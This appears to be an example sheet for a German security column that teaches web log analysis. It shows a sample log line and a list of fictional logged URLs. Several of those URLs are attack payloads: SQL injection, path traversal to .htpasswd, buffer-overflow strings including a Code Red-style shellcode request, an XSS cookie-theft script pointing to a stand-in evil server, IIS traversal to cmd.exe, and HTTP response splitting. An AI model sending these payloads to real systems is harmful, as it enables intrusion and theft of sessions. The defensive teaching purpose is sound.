Examples for About Security #40

Example 1: A log file line



Date   Time      Sender address  Authentication data  Method  URL          Bytes transferred  Status messages  Rule/filter  Action (if any)
Jan 3  02:56:12  a.b.c.d         user / password      GET     /index.html  1234               200 (OK)         4            permit

Example 2: URL entries of the fictional log file



  1  /index.html
  2  /Pfad/zur/Webanwendung1/login.php?user=foo&pass=bar&sprache=deutsch
  3  /Pfad/zur/Webanwendung2/index.cgi?aktion=login&user=Bla&pass='%20OR%201%3D1%20--
  4  /Pfad/zur/Webanwendung1/index.php?sprache=../../../.htpasswd
  5  /Pfad/zur/Webanwendung3/aktion.cgi?aktion=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  6  /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a     
  7  /Pfad/zur/Webanwendung3/aktion.cgi?aktion=anzeigen&id=%3Cscript%3Edocument%2Elocation%3D%2Chttp%3A%2F%2Fwww%2Eboeser%2Dserver%2Eexample%2Fcgi%2Dbin%2Fcookieklau%2Ecgi%3F%2C%20%2Bdocument%2Ecookie%3C%2Fscript%3E
  8  /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
  9  /test/index.html
 10  /test/Pfad/zur/Webanwendung1/index.php
 11  /redir_lang.jsp?lang=englisch
 12  /redir_lang.jsp?lang=sinnlos%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContentLength:%2023%0d%0a%0d%0a<html>Geschafft!</html>